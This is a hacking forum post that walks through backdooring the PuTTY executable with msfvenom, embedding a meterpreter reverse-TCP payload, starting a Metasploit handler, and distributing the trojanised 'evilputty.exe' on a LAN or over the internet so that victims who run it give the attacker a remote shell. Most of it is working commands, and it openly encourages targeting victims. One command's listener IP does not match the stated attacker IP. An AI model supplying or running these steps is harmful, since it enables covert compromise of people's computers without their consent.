x32x01

ADMINISTRATOR
Staff Member
Today, we’re going to create windows executable backdoor using Metasploit Exploitation Framework’s using msfvenom.

1-1.png

How To Backdoor Windows Executables Using Metasploit

First make sure Metasploit is already installed.


If you’re using Mac/Linux you can install Metasploit by using this method. If you’re using Kali Linux then Metasploit is pre-installed on it.

For LAN/Wifi Networks:

Now follow me step by step:
Attacker’s IP: 192.168.1.2
Victim’s IP: 192.168.1.x (within LAN network it might be any IP)

1- Open terminal and download putty using wget.
Code:
wget http://the.earth.li/~sgtatham/putty/0.63/x86/putty.exe

2- I was in root directory when i used above command. So, putty got downloaded in /root/ directory.
Now use msfvenom to backdoor this executable using the following command.
Code:
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=192.168.0.14 LPORT=5555 > evilputty.exe

Screen-Shot-2016-12-08-at-11.50.24-pm.png

Above command will generate an EXE file with the name evilputty.exe. This is our backdoored executable file.

3- Start metasploit.
Code:
msfconsole

4- Start metasploit’s reverse handler to get a reverse connection.
Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 5555
exploit

5- Distribute this evilputty.exe file in your LAN/Wifi network and wait for victim. When victim will open this evilputty.exe , you will get a reverse shell on your metasploit’s handler. Happy Hacking 🙂

For WAN Or Internet:

To use this method over WAN/Internet, you need to forward your ports.

Follow my following tutorial for better understanding of metasploit’s working over internet.

If you successfully port forwarded and open your port.
Code:
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=”YOUR PUBLIC IP ADDRESS” LPORT=5555 > evilputty.exe

You’re public ip address might not be static so in that case you should be using NO-IP DNS to get a static address.

Simple write your NO-IP Host in LHOST=example.noip.com

If you have any questions related to port forwarding or attacking in WAN Network please don’t forget to comment below!
 
Top